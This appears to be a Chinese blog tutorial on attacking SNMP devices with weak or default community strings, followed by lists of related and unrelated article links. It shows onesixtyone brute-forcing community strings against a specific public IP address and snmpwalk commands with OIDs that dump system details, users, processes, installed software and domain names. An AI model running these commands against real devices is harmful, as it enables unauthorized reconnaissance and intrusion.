科普Snmap:

  简单网络管理协议(SNMP) 是专门设计用于在 IP 网络管理网络节点(服务器、工作站、路由器、交换机及HUBS等)的一种标准协议,它是一种应用层协议。具体废话就不多说了,自己百度去。默认端口号是:161

如果能获取只读(RO)或读/写(RW)权限的团体字符串,将对你从设备中提取信息发挥重要作用,

snmp v1 v2天生存在安全缺陷,snmp v3中添加了加密功能提供了更好的检查机制,增强了安全性为了获取管理一台交换机的权限,首先你需要找到它的SNMP团体字符串。

团体字符串默认为:public

如果你不知道目标团体字符串

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 58.215.76.23 -o my.log -w 100

显示对方团体字符串为 public

查看onesixtyone 目录

dpkg -L onesixtyone

查看自带密码目录,你也可以使用自己的字典

cat /usr/share/doc/onesixtyone/dict.txt





snmpwalk -c public -v 1  ip .1.3.6.1.2.1.25.1 得到取得windows端的系统进程用户数等


snmpwalk -c public -v 1 ip .1.3.6.1.2.1.25.2.2 取得系统总内存


snmpwalk -c public -v 1  ip hrSystemNumUsers 取得系统用户数


snmpwalk -c public -v 1  ip .1.3.6.1.2.1.4.20 取得IP信息


snmpwalk -v 2c -c public ip .1.3.6.1.2.1.1 查看系统信息


其中-v是指版本,-c 是指密钥。


snmpwalk功能很多,可以获取系统各种信息,只要更改后面的信息类型即可。如果不知道什么类型,也可以不指定,这样所有系统信息都获取到:


常用:snmpwalk -v 2c -c public 10.0.1.52


另外常用的


.1.3.6.1.4.1.77.1.4.1.0  列出域名
.1.3.6.1.2.1.25.6.3.1.2  列出安装的软件


.1.3.6.1.2.1.25.4.2.1.2  列出系统进程


展示一波成功的案例:






 
												


											
snmap弱口令攻击利用的更多相关文章
	

    
								
  1. oracle弱口令攻击
		
    oracle弱口令攻击   0x00 oracle数据库简介 oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点: 一.支持大数据 ...
    
		
    2. 
						
  2. 全国职业技能大赛信息安全管理与评估-MySQL弱口令利用
		
    MySQL读文件 #coding=utf-8 import MySQLdb host = '172.16.1.' for i in range(129,131): tag = host+str(i)  ...
    
		
    3. 
						
  3. 攻防世界-Web-lottery(.git泄露、php源码审计、弱类型利用)
		
    扫描目录,发现.git泄露: 提取.git泄露的源码,得到许多文件: 网站这里: 这就要审计一下代码,找找漏洞了. 经过一番审计,猜数字对应的函数在api.php中: 我们要绕过这个$win_numb ...
    
		
    4. 
						
  4. IoT设备上的恶意软件——通过漏洞、弱密码渗透
		
    2018年,是 IoT 高速发展的一年,从空调到电灯,从打印机到智能电视,从路由器到监控摄像头统统都开始上网.随着5G网络的发展,我们身边的 IoT 设备会越来越多.与此同时,IoT 的安全问题也慢慢 ...
    
		
    5. 
						
  5. 简单说说.Net中的弱引用
		
    弱引用是什么? 要搞清楚什么是弱引用,我们需要先知道强引用是什么.强引用并不是什么深奥的概念,其实我们平时所使用的.Net引用就是强引用.例如: Cat kitty = new Cat(); 变量ki ...
    
		
    6. 
						
  6. .NET中的弱引用
		
    弱引用是什么? 要搞清楚什么是弱引用,我们需要先知道强引用是什么.强引用并不是什么深奥的概念,其实我们平时所使用的.Net引用就是强引用.例如: Cat cat = new Cat(); 变量cat就 ...
    
		
    7. 
						
  7. snmp默认团体名/弱口令漏洞及安全加固
		
    0x00基础知识 简单网络管理协议(SNMP)被广泛用于计算机操作系统设备.网络设备等领域监测连接到网络上的设备是否有任何引起管理上关注的情况.在运行SNMP服务的设备上,若管理员配置不当运行默认团体 ...
    
		
    8. 
						
  8. Linux安全事件应急响应排查方法总结
		
    Linux安全事件应急响应排查方法总结 Linux是服务器操作系统中最常用的操作系统,因为其拥有高性能.高扩展性.高安全性,受到了越来越多的运维人员追捧.但是针对Linux服务器操作系统的安全事件也非 ...
    
		
    9. 
						
  9. Window应急响应(四):挖矿病毒
		
    0x00 前言 ​ 随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一.病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑CPU占用率高,C盘可使用空间骤降,电脑温度升 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. ant:如何用ant将web project打包成war包
			
    说明:src中的文件将不会呈现出来,诸位可以自己写一个简单的web项目,然后依照我所提供的ant脚本配置来设置. 文件结构如图所示:               配置为下: build.xml < ...
    
			
    2. 
						
  2. 三星HTC价格跳水 安卓旗舰会否崩塌?
			
    安卓旗舰会否崩塌?" title="三星HTC价格跳水 安卓旗舰会否崩塌?"> 官方降价,对于国产手机来说似乎是家常便饭.小米.魅族等,总会时隔几个月就将自家旗舰机 ...
    
			
    3. 
						
  3. 【RxJava Demo分析】(二)Schedulers线程调度器 · Hans Zone
			
    用Schedulers(调度器)实现多任务(并发,Concurrency)的例子 废话不多说我们看一下有关于RxJava的代码: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ...
    
			
    4. 
						
  4. C++走向远洋——20(项目一,三角形,类)
			
    */ * Copyright (c) 2016,烟台大学计算机与控制工程学院 * All rights reserved. * 文件名:sanjiaoxing.cpp * 作者:常轩 * 微信公众号: ...
    
			
    5. 
						
  5. Internet上的音频/视频概述
			
    Internet上的音频/视频概述 计算机网络最初是为传送数据信息设计的.因特网 IP 层提供的"尽最大努力交付"服务,以及每一个分组独立交付的策略,对传送数据信息也是很合适的.  ...
    
			
    6. 
						
  6. P1678 烦恼的高考志愿
			
    P1678题库链接:https://www.luogu.org/problem/P1678 难度:普及- 算法标签:模拟,贪心,排序,二分查找 1.朴素模拟 O(m*n) 得分30 先将m个学校的录取 ...
    
			
    7. 
						
  7. 国产数据库适配publiccms开源项目
			
    金仓数据库适配 操作说明: 一.在程序的所有实体层添加schema=”public”(这里的public是根据数据库定义的模式) 二.切换数据库,修改配置文件cms.properties里面的cms. ...
    
			
    8. 
						
  8. 使用IDEA创建Maven整合SSM
			
    创建数据库 CREATE DATABASE `ssmbuild`; USE `ssmbuild`; DROP TABLE IF EXISTS `books`; CREATE TABLE `books` ...
    
			
    9. 
						
  9. html/css系列-图片上下居中
			
    本文详情:http://www.zymseo.com/276.html图片上下居中的问题常用的几种方法:图片已知大小和未知大小,自行理解 .main{ width: 400px;height: 400 ...
    
			
    10. 
						
  10. Eclipse与MyEclipse的联系和区别
			
    Eclipse与MyEclipse的联系和区别  Eclipse 是一个IDE(Integrated Developing Environment),而这个IDE是允许安装第三方开发的插件来使自身的功 ...
    
			
    11.